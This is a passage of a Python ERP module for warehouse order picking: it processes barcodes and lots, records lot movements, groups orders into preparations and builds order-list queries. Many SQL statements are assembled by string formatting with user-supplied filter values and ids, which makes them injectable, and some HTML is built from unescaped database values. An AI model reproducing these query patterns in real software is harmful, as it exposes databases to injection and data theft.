\"'\")\n if not curMovilote.first():\n resul['status'] = -3\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n curMovilote.setModeAccess(curMovilote.Edit)\n curMovilote.refreshBuffer()\n curMovilote.setValueBuffer(\"cantidad\", curMovilote.valueBuffer(\"cantidad\") + cantidad)\n if not curMovilote.commitBuffer():\n resul['status'] = -3\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n else:\n curMovilote = qsatype.FLSqlCursor(u\"movilote\")\n curMovilote.setModeAccess(curMovilote.Insert)\n curMovilote.refreshBuffer()\n curMovilote.setValueBuffer(\"cantidad\", cantidad)\n curMovilote.setValueBuffer(\"idstock\", idStock)\n curMovilote.setValueBuffer(\"tipo\", \"Salida\")\n curMovilote.setValueBuffer(\"codlote\", codLote)\n curMovilote.setValueBuffer(\"docorigen\", \"PC\")\n curMovilote.setValueBuffer(\"fecha\", hoy)\n curMovilote.setValueBuffer(\"idlineapc\", idLinea)\n\n if not curMovilote.commitBuffer():\n resul['status'] = -1\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n\n resul['status'] = 0\n resul['msg'] = \"OK\"\n resul['param'] = idLinea\n return resul\n\n def sanhigia_pedidos_analizaCodBarrasLote(self, referencia, barcode, codigo, cantidad, idLinea, codAlmacen):\n # 2.2 El barcode es cuadrado\n resul = {}\n # codigo = lote\n # lo que tenemos es el codigo de lotes pero lo que se inserta es el campo codlote de lotes, vamos a buscar el primer codlote de la tabla lotes que tenga como codigo el lote que hemos ledio y que tenga stock\n # print(\"analiza codbarraslote\", referencia)\n codLote = qsatype.FLUtil.sqlSelect(u\"lotes\", u\"codlote\", ustr(u\"codigo = '\", codigo, u\"' AND enalmacen > 0 AND referencia ='\", referencia, \"'\"))\n if codLote == u\"\" or not codLote:\n resul['status'] = -3\n resul['msg'] = \"No existe ningún lote con stock para este pedido\"\n resul['param'] = idLinea\n return resul\n\n idStock = qsatype.FLUtil.sqlSelect(u\"stocks\", u\"idstock\", ustr(u\"referencia = '\", referencia, u\"' AND codalmacen = '\", codAlmacen, u\"'\"))\n if idStock == u\"\" or not idStock:\n resul['status'] = -1\n resul['msg'] = \"No existe stock para la referencia '{}' en el almacén '{}'\".format(referencia, codAlmacen)\n resul['param'] = idLinea\n return resul\n\n hoy = qsatype.Date()\n idmovilote = qsatype.FLUtil.sqlSelect(u\"movilote\", u\"id\", u\"idlineapc = '{}' AND fecha = '{}' AND codlote = '{}' AND idlineaac is null\".format(idLinea, hoy, codLote))\n if idmovilote:\n curMovilote = qsatype.FLSqlCursor(u\"movilote\")\n curMovilote.select(\"id = '{}\".format(idmovilote))\n if not curMovilote.first():\n resul['status'] = -3\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n curMovilote.setModeAccess(curMovilote.Edit)\n curMovilote.refreshBuffer()\n curMovilote.setValueBuffer(\"cantidad\", curMovilote.valueBuffer(\"cantidad\") + cantidad)\n if not curMovilote.commitBuffer():\n resul['status'] = -3\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n else:\n cantidad = cantidad * -1\n curMovilote = qsatype.FLSqlCursor(u\"movilote\")\n curMovilote.setModeAccess(curMovilote.Insert)\n curMovilote.refreshBuffer()\n curMovilote.setValueBuffer(\"cantidad\", cantidad)\n curMovilote.setValueBuffer(\"idstock\", idStock)\n curMovilote.setValueBuffer(\"tipo\", \"Salida\")\n curMovilote.setValueBuffer(\"codlote\", codLote)\n curMovilote.setValueBuffer(\"docorigen\", \"PC\")\n curMovilote.setValueBuffer(\"fecha\", hoy)\n curMovilote.setValueBuffer(\"idlineapc\", idLinea)\n\n if not curMovilote.commitBuffer():\n resul['status'] = -1\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n\n resul['status'] = 0\n resul['msg'] = \"OK\"\n resul['param'] = idLinea\n return resul\n return None\n\n def sanhigia_pedidos_getFilters(self, model, name, template=None):\n filters = []\n if name == 'pedidosNoBorradores':\n filtro_estadopago = self.dameFiltroEstadoPago()\n acodpedido = []\n q = qsatype.FLSqlQuery()\n q.setTablesList(u\"pedidoscli\")\n q.setSelect(u\"codigo\")\n q.setFrom(u\"pedidoscli\")\n q.setWhere(u\"pda IN ('Pendiente', 'Listo PDA', 'Preparado', 'Albaranado', 'Parcial') AND servido IN ('No', 'Parcial') AND (sh_estadopago NOT IN ({}) OR sh_estadopago is null)\".format(filtro_estadopago))\n if not q.exec_():\n return []\n # if q.size() > 100:\n # return []\n while q.next():\n acodpedido.append(q.value(\"codigo\"))\n filters.append({'criterio': 'codigo__in', 'valor': acodpedido, 'tipo': 'q'})\n if name == 'nocompletados':\n filters.append({'criterio': 'codagente__in', 'valor': [agente[0].codagente]})\n return filters\n\n def sanhigia_pedidos_agruparPedidos(self, model, oParam):\n response = {}\n if (\"selecteds\" not in oParam or not oParam['selecteds']) and \"data\" not in oParam:\n response['status'] = -1\n response['msg'] = \"Debes seleccionar pedido Desde y Hasta\"\n return response\n # or (\"data\" in oParam and not oParam[\"data\"][\"descripcion\"])\n if \"data\" not in oParam or (\"data\" in oParam and not oParam[\"data\"][\"descripcion\"]):\n response['status'] = -1\n if \"data\" in oParam and not oParam[\"data\"][\"descripcion\"]:\n response[\"title\"] = \"Campo descripción es obligatorio\"\n response['data'] = {\"selecteds\": oParam[\"data\"]['selecteds'], \"ubicacionini\": oParam[\"data\"][\"ubicacionini\"], \"ubicacionfin\": oParam[\"data\"][\"ubicacionfin\"]}\n else:\n response['data'] = {\"selecteds\": oParam['selecteds']}\n response['params'] = [\n {\n \"tipo\": 3,\n \"required\": True,\n \"verbose_name\": \"Descripción\",\n \"key\": \"descripcion\",\n \"visible\": True,\n \"validaciones\": None,\n \"style\": {\n \"width\": \"100%\"\n }\n },\n {\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"key\": \"ubicacionini\",\n \"desc\": \"codubicacion\",\n \"disabled_name\": \"Ubicacion Inicial\",\n \"auto_name\": \"Ubicacion Inicial\",\n \"tipo\": 55,\n \"rel\": \"sh_ubicaciones\",\n \"function\": \"getCodUbicacion\",\n \"className\": \"relatedField\",\n \"to_field\": \"codubicacion\"\n },\n {\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"key\": \"ubicacionfin\",\n \"desc\": \"codubicacion\",\n \"disabled_name\": \"Ubicacion Final\",\n \"auto_name\": \"Ubicacion Final\",\n \"tipo\": 55,\n \"rel\": \"sh_ubicaciones\",\n \"function\": \"getCodUbicacion\",\n \"className\": \"relatedField\",\n \"to_field\": \"codubicacion\"\n }\n ]\n return response\n response = {}\n arrPedidoscli = oParam[\"data\"]['selecteds'].split(u\",\")\n if len(arrPedidoscli) == 0:\n response['status'] = -1\n response['msg'] = \"Debes seleccionar al menos un pedido\"\n return response\n\n # print(\"_____generarpreparacion____\")\n preparacion = self.sanhigia_pedidos_generaPreparaciondepedidos(model, oParam[\"data\"])\n # print(preparacion)\n if not preparacion:\n response['status'] = -1\n response['msg'] = \"Error al generar la agrupación\"\n return response\n\n if \"preparacion\" not in preparacion:\n return preparacion\n\n response['status'] = 1\n response['url'] = \"/facturacion/sh_preparaciondepedidos/{}\".format(preparacion[\"preparacion\"])\n return response\n\n def sanhigia_pedidos_generaPreparaciondepedidos(self, model, oParam):\n resul = {}\n ubicacionini = oParam[\"ubicacionini\"]\n ubicacionfin = oParam[\"ubicacionfin\"]\n pedidoscli = \"'\" + \"','\".join(oParam['selecteds'].split(\",\")) + \"'\"\n consulta_where = u\"l.idpedido IN ({0}) AND u.codubicacion >= '{1}' AND u.codubicacion <= '{2}' AND (l.sh_preparacion is null OR l.sh_preparacion NOT LIKE 'En Curso') AND l.cantidad > l.totalenalbaran AND NOT l.cerrada GROUP BY l.idlinea\".format(pedidoscli, ubicacionini, ubicacionfin)\n query = qsatype.FLSqlQuery()\n query.setTablesList(u\"lineaspedidoscli, ubicacionesarticulo\")\n query.setSelect(u\"l.idlinea\")\n query.setFrom(u\"lineaspedidoscli l LEFT OUTER JOIN ubicacionesarticulo u ON l.referencia = u.referencia\")\n query.setWhere(consulta_where)\n if not query.exec_():\n resul['status'] = -2\n resul['msg'] = \"Error al ejecutar la consulta\"\n return resul\n if query.size() < 1:\n resul['status'] = -2\n resul['msg'] = \"No se encuentran elementos que cumplan los requisitos\"\n return resul\n if query.size() > 0:\n curPreparaciondepedidos = qsatype.FLSqlCursor(u\"sh_preparaciondepedidos\")\n codpreparacion = qsatype.FLUtil.nextCounter(u\"codpreparaciondepedido\", curPreparaciondepedidos)\n curPreparaciondepedidos.setModeAccess(curPreparaciondepedidos.Insert)\n curPreparaciondepedidos.refreshBuffer()\n curPreparaciondepedidos.setValueBuffer(u\"codpreparaciondepedido\", codpreparacion)\n curPreparaciondepedidos.setValueBuffer(u\"descripcion\", oParam[\"descripcion\"])\n curPreparaciondepedidos.setValueBuffer(u\"fecha\", qsatype.Date())\n curPreparaciondepedidos.setValueBuffer(u\"ubicacionini\", oParam[\"ubicacionini\"])\n curPreparaciondepedidos.setValueBuffer(u\"ubicacionfin\", oParam[\"ubicacionfin\"])\n # curPreparaciondepedidos.setValueBuffer(u\"desdehasta\", oParam[\"selecteds\"])\n if not curPreparaciondepedidos.commitBuffer():\n return False\n while query.next():\n if not qsatype.FLUtil.execSql(u\"UPDATE lineaspedidoscli set sh_preparacion = 'En Curso', codpreparaciondepedido='{0}', cerradapda = false WHERE idlinea = {1}\".format(codpreparacion, query.value(0))):\n resul['status'] = -2\n resul['msg'] = \"Error al asignar línea {}\".format(query.value(0))\n return resul\n resul[\"status\"] = 1\n resul[\"preparacion\"] = codpreparacion\n return resul\n else:\n resul['status'] = -2\n resul['msg'] = \"No se encuentran elementos que cumplan los requisitos\"\n return resul\n\n def sanhigia_pedidos_generaPreparaciondepedidosConStock(self, model, oParam):\n resul = {}\n ubicacionini = oParam[\"ubicacionini\"]\n ubicacionfin = oParam[\"ubicacionfin\"]\n pendientes_pago = oParam[\"pendientespago\"]\n filtro_estadopago = self.dameFiltroEstadoPago()\n if pendientes_pago is None:\n filtro_estadopago += \",'Pagos pendientes'\"\n # TODO query ver numero de lineas si > 100 o < 1 avisar\n # numLineas = qsatype.FLUtil.execSql(ustr(u\"select l.idlinea from WHERE \")\n query = qsatype.FLSqlQuery()\n query.setTablesList(u\"pedidoscli,lineaspedidoscli, ubicacionesarticulo\")\n query.setSelect(u\"l.idlinea\")\n query.setFrom(u\"pedidoscli p INNER JOIN lineaspedidoscli l on l.idpedido = p.idpedido LEFT JOIN ubicacionesarticulo u ON l.referencia = u.referencia LEFT JOIN stocks s ON (l.referencia = s.referencia\")\n where_consulta = u\"p.servido in ('No','Parcial') AND p.pda IN ('Pendiente', 'Listo PDA', 'Preparado', 'Parcial') AND u.codubicacion >= '{0}' AND u.codubicacion <= '{1}' AND (l.sh_preparacion is null OR l.sh_preparacion NOT LIKE 'En Curso') AND l.totalenalbaran <> l.cantidad AND s.cantidad > 0 AND (p.sh_estadopago not in ({2}) OR p.sh_estadopago is null)\".format(ubicacionini, ubicacionfin, filtro_estadopago)\n if \"fechaini\" in oParam and oParam[\"fechaini\"] is not None:\n where_consulta = \"{0} AND p.fecha >= '{1}'\".format(where_consulta, oParam[\"fechaini\"])\n if \"fechafin\" in oParam and oParam[\"fechafin\"] is not None:\n where_consulta = \"{0} AND p.fecha <= '{1}'\".format(where_consulta, oParam[\"fechafin\"])\n array_referencias = []\n where_referencias = None\n if \"referencia1\" in oParam and oParam[\"referencia1\"] is not None:\n array_referencias.append(oParam[\"referencia1\"])\n if \"referencia2\" in oParam and oParam[\"referencia2\"] is not None:\n array_referencias.append(oParam[\"referencia2\"])\n if len(array_referencias) > 0:\n where_referencias = \"','\".join(array_referencias)\n if where_referencias is not None:\n where_consulta = \"{0} AND l.referencia IN ('{1}')\".format(where_consulta, where_referencias)\n\n query.setWhere(where_consulta)\n if query.exec_():\n if query.size() >= 1:\n # print(\"hay mas de uno\", query.size())\n curPreparaciondepedidos = qsatype.FLSqlCursor(u\"sh_preparaciondepedidos\")\n codpreparacion = qsatype.FLUtil.nextCounter(u\"codpreparaciondepedido\", curPreparaciondepedidos)\n if not codpreparacion:\n return False\n if not qsatype.FLUtil.execSql(u\"UPDATE lineaspedidoscli set sh_preparacion = 'En Curso', codpreparaciondepedido='{0}' WHERE idlinea IN (select l.idlinea from pedidoscli p INNER JOIN lineaspedidoscli l on l.idpedido = p.idpedido LEFT JOIN ubicacionesarticulo u ON l.referencia = u.referencia LEFT JOIN stocks s ON l.referencia = s.referencia WHERE {1})\".format(codpreparacion, where_consulta)):\n return False\n curPreparaciondepedidos.setModeAccess(curPreparaciondepedidos.Insert)\n curPreparaciondepedidos.refreshBuffer()\n curPreparaciondepedidos.setValueBuffer(u\"codpreparaciondepedido\", codpreparacion)\n curPreparaciondepedidos.setValueBuffer(u\"descripcion\", oParam[\"descripcion\"])\n curPreparaciondepedidos.setValueBuffer(u\"fecha\", qsatype.Date())\n curPreparaciondepedidos.setValueBuffer(u\"ubicacionini\", oParam[\"ubicacionini\"])\n curPreparaciondepedidos.setValueBuffer(u\"ubicacionfin\", oParam[\"ubicacionfin\"])\n curPreparaciondepedidos.setValueBuffer(u\"desdehasta\", oParam[\"selecteds\"])\n curPreparaciondepedidos.setValueBuffer(u\"tipo\", \"Stock\")\n if not curPreparaciondepedidos.commitBuffer():\n return False\n resul[\"status\"] = 1\n resul[\"preparacion\"] = codpreparacion\n return resul\n else:\n resul['status'] = -2\n resul['msg'] = \"No se encuentran elementos que cumplan los requisitos\"\n return resul\n # return False\n else:\n resul['status'] = -2\n resul['msg'] = \"No se encuentran elementos que cumplan los requisitos\"\n return resul\n return True\n\n def sanhigia_pedidos_agruparpedidosstock(self, model, oParam):\n response = {}\n if \"data\" not in oParam or (\"data\" in oParam and not oParam[\"data\"][\"descripcion\"]):\n response['status'] = -1\n if \"data\" in oParam and not oParam[\"data\"][\"descripcion\"]:\n response[\"title\"] = \"Campo descripción es obligatorio\"\n response['data'] = {\"ubicacionini\": oParam[\"data\"][\"ubicacionini\"], \"ubicacionfin\": oParam[\"data\"][\"ubicacionfin\"], \"fechaini\": oParam[\"data\"][\"fechaini\"], \"fechafin\": oParam[\"data\"][\"fechafin\"]}\n else:\n response['data'] = {\"selecteds\": \"\"}\n response['params'] = [\n {\n \"tipo\": 3,\n \"required\": True,\n \"verbose_name\": \"Descripción\",\n \"key\": \"descripcion\",\n \"visible\": True,\n \"validaciones\": None,\n \"style\": {\n \"width\": \"100%\"\n }\n },\n {\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"key\": \"ubicacionini\",\n \"desc\": \"codubicacion\",\n \"disabled_name\": \"Ubicacion Inicial\",\n \"auto_name\": \"Ubicacion Inicial\",\n \"tipo\": 55,\n \"rel\": \"sh_ubicaciones\",\n \"function\": \"getCodUbicacion\",\n \"className\": \"relatedField\",\n \"to_field\": \"codubicacion\"\n },\n {\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"key\": \"ubicacionfin\",\n \"desc\": \"codubicacion\",\n \"disabled_name\": \"Ubicacion Final\",\n \"auto_name\": \"Ubicacion Final\",\n \"tipo\": 55,\n \"rel\": \"sh_ubicaciones\",\n \"function\": \"getCodUbicacion\",\n \"className\": \"relatedField\",\n \"to_field\": \"codubicacion\"\n },\n {\n \"tipo\": 26,\n \"required\": False,\n \"verbose_name\": \"Fecha Inicial\",\n \"key\": \"fechaini\",\n \"visible\": True,\n \"validaciones\": None,\n \"style\": {\n \"width\": \"100%\"\n }\n },\n {\n \"tipo\": 26,\n \"required\": False,\n \"verbose_name\": \"Fecha Final\",\n \"key\": \"fechafin\",\n \"visible\": True,\n \"validaciones\": None,\n \"style\": {\n \"width\": \"100%\"\n }\n },\n {\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"key\": \"referencia1\",\n \"desc\": \"referencia\",\n \"disabled_name\": \"Referencia 1\",\n \"auto_name\": \"Referencia 1\",\n \"tipo\": 55,\n \"rel\": \"articulos\",\n \"function\": \"getReferencia\",\n \"className\": \"relatedField\",\n \"to_field\": \"referencia\"\n },\n {\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"key\": \"referencia2\",\n \"desc\": \"referencia\",\n \"disabled_name\": \"Referencia 2\",\n \"auto_name\": \"Referencia 2\",\n \"tipo\": 55,\n \"rel\": \"articulos\",\n \"function\": \"getReferencia\",\n \"className\": \"relatedField\",\n \"to_field\": \"referencia\"\n },\n {\n \"tipo\": 18,\n \"required\": False,\n \"verbose_name\": \"Pendiente de pago\",\n \"key\": \"pendientespago\",\n \"visible\": True,\n \"validaciones\": None,\n \"style\": {\n \"width\": \"100%\"\n }\n }\n ]\n return response\n preparacion = self.sanhigia_pedidos_generaPreparaciondepedidosConStock(model, oParam[\"data\"])\n if not preparacion:\n response['status'] = -1\n response['msg'] = \"Error al generar la agrupación\"\n return response\n\n if \"preparacion\" not in preparacion:\n return preparacion\n\n response['status'] = 1\n response['url'] = \"/facturacion/sh_preparaciondepedidos/{}\".format(preparacion[\"preparacion\"])\n return response\n\n def sanhigia_pedidos_quitarTrabajador(self, model, oParam):\n # print(oParam)\n response = {}\n if (\"selecteds\" not in oParam or not oParam['selecteds']) and \"data\" not in oParam:\n response['status'] = -1\n response['msg'] = \"Debes seleccionar pedido Desde y Hasta\"\n return response\n response = {}\n\n preparacion = self.sanhigia_pedidos_actualizarTrabajador(model, oParam)\n if not preparacion:\n response['status'] = -1\n response['msg'] = \"Error al quitar el trabajador\"\n return response\n\n return True\n\n def sanhigia_pedidos_actualizarTrabajador(self, model, oParam):\n pedidoscli = \"'\" + \"','\".join(oParam['selecteds'].split(\",\")) + \"'\"\n if not qsatype.FLUtil.sqlUpdate(u\"pedidoscli\", u\"codtrabajador\", u\"\", u\"servido not like 'Sí' AND pda IN ('Pendiente') AND idpedido IN ({})\".format(pedidoscli)):\n return False\n return True\n\n\n def sanhigia_pedidos_visualizarPedido(self, model):\n qPedido = qsatype.FLSqlQuery()\n qPedido.setTablesList(u\"pedidoscli\")\n qPedido.setSelect(u\"codigo, codcliente, nombrecliente, fecha, dirtipovia, direccion, ciudad, provincia, dirnum, dirotros\")\n qPedido.setFrom(u\"pedidoscli\")\n qPedido.setWhere(u\"idpedido = {} \".format(model.idpedido))\n if not qPedido.exec_():\n return response\n if qPedido.next():\n codigo = qPedido.value(\"codigo\")\n nombrecliente = qPedido.value(\"nombrecliente\")\n fecha = qPedido.value(\"fecha\")\n direccion = str(qPedido.value(\"dirtipovia\") or \"\") + \" \" + str(qPedido.value(\"direccion\") or \"\") + \", \" + str(qPedido.value(\"dirnum\") or \"\") + \" \" + str(qPedido.value(\"dirotros\") or \"\") + \", \" + str(qPedido.value(\"ciudad\") or \"\") + \", \" + str(qPedido.value(\"provincia\") or \"\")\n response = {}\n response[\"status\"] = 2\n response[\"confirm\"] = \"
\" + codigo + \"
\" + str(fecha) + \"

\" + nombrecliente + \"

\" + direccion + \"
\"\n response[\"customButtons\"] = []\n q = qsatype.FLSqlQuery()\n q.setTablesList(u\"lineaspedidoscli,stocks\")\n q.setSelect(u\"lineaspedidoscli.descripcion, lineaspedidoscli.shcantalbaran, lineaspedidoscli.cantidad, lineaspedidoscli.totalenalbaran, lineaspedidoscli.referencia, stocks.cantidad\")\n q.setFrom(u\"lineaspedidoscli LEFT OUTER JOIN stocks ON lineaspedidoscli.referencia = stocks.referencia AND stocks.codalmacen = 'ALM'\")\n q.setWhere(u\"idpedido = {} \".format(model.idpedido))\n if not q.exec_():\n return response\n response[\"confirm\"] += \"
Artículos
\"\n while q.next():\n estadoLinea = \"background-color:lightgreen;\"\n if q.value(\"lineaspedidoscli.shcantalbaran\") != q.value(\"lineaspedidoscli.cantidad\"):\n estadoLinea = \"\"\n ubicacion = qsatype.FLUtil.sqlSelect(\"ubicacionesarticulo\", \"codubicacion\", \"referencia = '{}'\".format(q.value(\"lineaspedidoscli.referencia\"))) or \"\"\n response[\"confirm\"] += \" \"\n response[\"confirm\"] += \"
\" + q.value(\"lineaspedidoscli.descripcion\") + \"\" + str(int(q.value(\"lineaspedidoscli.shcantalbaran\") or 0)) + \" / \" + str(int(int(q.value(\"lineaspedidoscli.cantidad\")) - int(q.value(\"lineaspedidoscli.totalenalbaran\")) or 0)) + \"\" + ubicacion + \"Stock: \" + str(int(q.value(\"stocks.cantidad\") or 0)) + \"
\"\n return response\n\n def sanhigia_pedidos_queryGrid_mastershpedidoscli(self, model, filters):\n where = \"1 = 1\"\n valores_estado_pago = self.dameFiltroEstadoPago()\n filtro_estadopago = \"AND (pedidoscli.sh_estadopago is null OR pedidoscli.sh_estadopago NOT IN ({}))\".format(valores_estado_pago)\n if filters and \"[ptespago]\" in filters and filters[\"[ptespago]\"] != \"\":\n filtro_estadopago = \" AND pedidoscli.sh_estadopago = 'Pagos pendientes'\"\n\n f_pedidosNoBorradores = \"pedidoscli.pda IN ('Pendiente', 'Listo PDA', 'Preparado', 'Albaranado', 'Parcial') AND pedidoscli.servido IN ('No', 'Parcial') {}\".format(filtro_estadopago)\n if where is not None:\n where += \" AND \"\n where += f_pedidosNoBorradores\n if filters:\n if \"[codigo]\" in filters and filters[\"[codigo]\"] != \"\":\n where += \" AND pedidoscli.codigo like '%{}%'\".format(filters[\"[codigo]\"])\n if \"[codcliente]\" in filters and filters[\"[codcliente]\"] != \"\":\n where += \" AND (UPPER(pedidoscli.codcliente) like '%{}%' OR UPPER(pedidoscli.nombrecliente) like '%{}%')\".format(filters[\"[codcliente]\"].upper(), filters[\"[codcliente]\"].upper())\n if \"[d_fecha]\" in filters and filters[\"[d_fecha]\"] != \"\":\n where += \" AND pedidoscli.fecha >= '{}'\".format(filters[\"[d_fecha]\"])\n if \"[h_fecha]\" in filters and filters[\"[h_fecha]\"] != \"\":\n where += \" AND pedidoscli.fecha <= '{}'\".format(filters[\"[h_fecha]\"])\n if \"[fecha]\" in filters and filters[\"[fecha]\"] != \"\":\n where += \" AND pedidoscli.fecha = '{}'\".format(filters[\"[fecha]\"])\n if \"[referencia1]\" in filters and filters[\"[referencia1]\"] != \"\":\n where += \" AND lineaspedidoscli.referencia = '{}'\".format(filters[\"[referencia1]\"])\n if \"[referencia2]\" in filters and filters[\"[referencia2]\"] != \"\":\n where += \" AND lineaspedidoscli.referencia = '{}'\".format(filters[\"[referencia2]\"])\n # Cambiar por stocks.cantidad >= (lineaspedidoscli.cantidad - lineaspedidoscli.totalenalbaran) - Pedido por Ines -fecha: 19-03-2021\n if \"[completadostock]\" in filters and filters[\"[completadostock]\"] != \"\":\n where += \" AND NOT lineaspedidoscli.cerrada AND lineaspedidoscli.cantidad > lineaspedidoscli.totalenalbaran AND stocks.cantidad >= (lineaspedidoscli.cantidad - lineaspedidoscli.totalenalbaran)\"\n if \"[codproveedor]\" in filters and filters[\"[codproveedor]\"] != \"\":\n where += \" AND (UPPER(articulosprov.codproveedor) like '%{}%' OR UPPER(articulosprov.nombre) like '%{}%')\".format(filters[\"[codproveedor]\"].upper(), filters[\"[codproveedor]\"].upper())\n # if \"[buscador]\" in filters and filters[\"[buscador]\"] != \"\":\n # where += \" AND UPPER(pedidoscli.nombre) LIKE '%\" + filters[\"[buscador]\"].upper() + \"%' OR UPPER(pedidoscli.nombre) LIKE '%\" + filters[\"[buscador]\"].upper() + \"%' OR UPPER(pedidoscli.nombre) LIKE '%\" + filters[\"[buscador]\"].upper() + \"%'\"\n query = {}\n query[\"tablesList\"] = (\"pedidoscli,lineaspedidoscli,sh_trabajadores\")\n query[\"select\"] = \"pedidoscli.idpedido,pedidoscli.codigo,pedidoscli.nombrecliente,pedidoscli.fecha,pedidoscli.total,pedidoscli.sh_estadopreparacion,pedidoscli.pda,pedidoscli.codtrabajador,sh_trabajadores.nombre,MAX(sh_preparaciondepedidos.descripcion)\"\n query[\"from\"] = (\"pedidoscli INNER JOIN lineaspedidoscli ON pedidoscli.idpedido = lineaspedidoscli.idpedido LEFT OUTER JOIN sh_trabajadores ON pedidoscli.codtrabajador = sh_trabajadores.codtrabajador LEFT OUTER JOIN sh_preparaciondepedidos ON lineaspedidoscli.codpreparaciondepedido = sh_preparaciondepedidos.codpreparaciondepedido LEFT JOIN stocks ON (lineaspedidoscli.referencia = stocks.referencia AND stocks.codalmacen='ALM') LEFT OUTER JOIN articulosprov ON (lineaspedidoscli.referencia = articulosprov.referencia AND articulosprov.pordefecto)\")\n query[\"where\"] = (where)\n query[\"groupby\"] = \" pedidoscli.idpedido,pedidoscli.codigo,pedidoscli.nombrecliente,pedidoscli.fecha,pedidoscli.total,pedidoscli.sh_estadopreparacion,pedidoscli.pda,pedidoscli.codtrabajador,sh_trabajadores.nombre\"\n query[\"orderby\"] = (\"pedidoscli.fecha DESC, pedidoscli.codigo DESC, pedidoscli.sh_estadopreparacion DESC\")\n query[\"selectcount\"] = \"count(distinct(pedidoscli.codigo))\"\n return query\n\n def sanhigia_pedidos_visualizarShPedido(self, model, oParam):\n response = {}\n response[\"url\"] = \"/facturacion/pedidoscli/{}\".format(model.pk)\n return response\n\n def sanhigia_pedidos_field_shpedidoscliQuerycolorRow(self, model):\n estado = model[\"pedidoscli.pda\"]\n trabajador = model[\"pedidoscli.codtrabajador\"]\n if estado == \"Listo PDA\":\n return \"cSuccess\"\n elif estado == \"Albaranado\":\n return \"cDanger\"\n elif trabajador:\n return \"cWarning\"\n else:\n return None\n\n def sanhigia_pedidos_creaLote(self, codigo, caducidad, referencia):\n codLote = qsatype.FLUtil.sqlSelect(u\"lotes\", u\"codlote\", u\"codigo = '{0}' AND referencia = '{1}' AND caducidad = '{2}'\".format(codigo, referencia, caducidad))\n if not codLote:\n query = qsatype.FLSqlQuery()\n query.setTablesList(u\"articulos\")\n query.setSelect(u\"descripcion\")\n query.setFrom(u\"articulos\")\n query.setWhere(\"referencia = '{}'\".format(referencia))\n\n if query.exec_():\n if query.next():\n descripcion = query.value(0)\n else:\n return False\n else:\n return False\n\n if not caducidad:\n resul = {}\n resul['status'] = -3\n resul['msg'] = \"F.Caducidad obligatoria\"\n resul['resul'] = False\n return resul\n\n curLote = qsatype.FLSqlCursor(u\"lotes\")\n curLote.setModeAccess(curLote.Insert)\n curLote.refreshBuffer()\n curLote.setValueBuffer(\"codigo\", codigo)\n curLote.setValueBuffer(\"caducidad\", caducidad)\n curLote.setValueBuffer(\"descripcion\", descripcion)\n curLote.setValueBuffer(\"referencia\", referencia)\n curLote.setValueBuffer(\"enalmacen\", 0)\n curLote.setValueBuffer(u\"codlote\", qsatype.FLUtil.nextCounter(u\"codlote\", curLote))\n if curLote.commitBuffer():\n return curLote.valueBuffer(\"codlote\")\n return False\n else:\n return codLote\n\n def sanhigia_pedidos_dameFiltroEstadoPago(self):\n filtro_estadopago = \"'Borrador','Borrador con promocion', 'Forma de pago bloqueada', 'Pendiente validar PA', 'Devolucion por preparar', 'Devolucion preparada', 'Devolucion aprobada', 'Aplicar código aduanas', 'Bloqueado Riesgo', 'Pagos pendientes', 'Pte. Validacion promocion'\"\n return filtro_estadopago\n\n def __init__(self, context=None):\n super(sanhigia_pedidos, self).__init__(context)\n\n def getFilters(self, model, name, template=None):\n return self.ctx.sanhigia_pedidos_getFilters(model, name, template)\n\n def procesaCodBarras(self, model, oParam):\n return self.ctx.sanhigia_pedidos_procesaCodBarras(model, oParam)\n\n def dameIdLinea(self, oParam):\n return self.ctx.sanhigia_pedidos_dameIdLinea(oParam)\n\n def respuestaAnalizaCodBarras(self, model, oParam, val):\n return self.ctx.sanhigia_pedidos_respuestaAnalizaCodBarras(model, oParam, val)\n\n def pedidoListoPDA(self, model, oParam):\n return self.ctx.sanhigia_pedidos_pedidoListoPDA(model, oParam)\n\n def initValidation(self, name, data):\n return self.ctx.sanhigia_pedidos_initValidation(name, data)\n\n def field_trabajador(self, model):\n return self.ctx.sanhigia_pedidos_field_trabajador(model)\n\n def field_colorRow(self, model):\n return self.ctx.sanhigia_pedidos_field_colorRow(model)\n\n def getForeignFields(self, model, template):\n return self.ctx.sanhigia_pedidos_getForeignFields(model, template)\n\n def asignarTrabajador(self, idpedido, codtrabajador):\n return self.ctx.sanhigia_pedidos_asignarTrabajador(idpedido, codtrabajador)\n\n def insertarMovilote(self, idLinea, referencia, cantidad, codAlmacen, codLote):\n return self.ctx.sanhigia_pedidos_insertarMovilote(idLinea, referencia, cantidad, codAlmacen, codLote)\n\n def analizaCodBarras(self, idPedido, barcode, cantidad, codAlmacen, idlineapedido):\n return self.ctx.sanhigia_pedidos_analizaCodBarras(idPedido, barcode, cantidad, codAlmacen, idlineapedido)\n\n def analizaCodBarrasLote(self, referencia, barcode, codigo, cantidad, idLinea, codAlmacen):\n return self.ctx.sanhigia_pedidos_analizaCodBarrasLote(referencia, barcode, codigo, cantidad, idLinea, codAlmacen)\n\n def agruparPedidos(self, model, oParam):\n return self.ctx.sanhigia_pedidos_agruparPedidos(model, oParam)\n\n def agruparpedidosstock(self, model, oParam):\n return self.ctx.sanhigia_pedidos_agruparpedidosstock(model, oParam)\n\n def quitarTrabajador(self, model, oParam):\n return self.ctx.sanhigia_pedidos_quitarTrabajador(model, oParam)\n\n def field_descPreparacion(self, model):\n return self.ctx.sanhigia_pedidos_field_descPreparacion(model)\n\n def actualizarTrabajador(self, model, oParam):\n return self.ctx.sanhigia_pedidos_actualizarTrabajador(model, oParam)\n\n def visualizarPedido(self, model):\n return self.ctx.sanhigia_pedidos_visualizarPedido(model)\n\n def queryGrid_mastershpedidoscli(self, model, filters):\n return 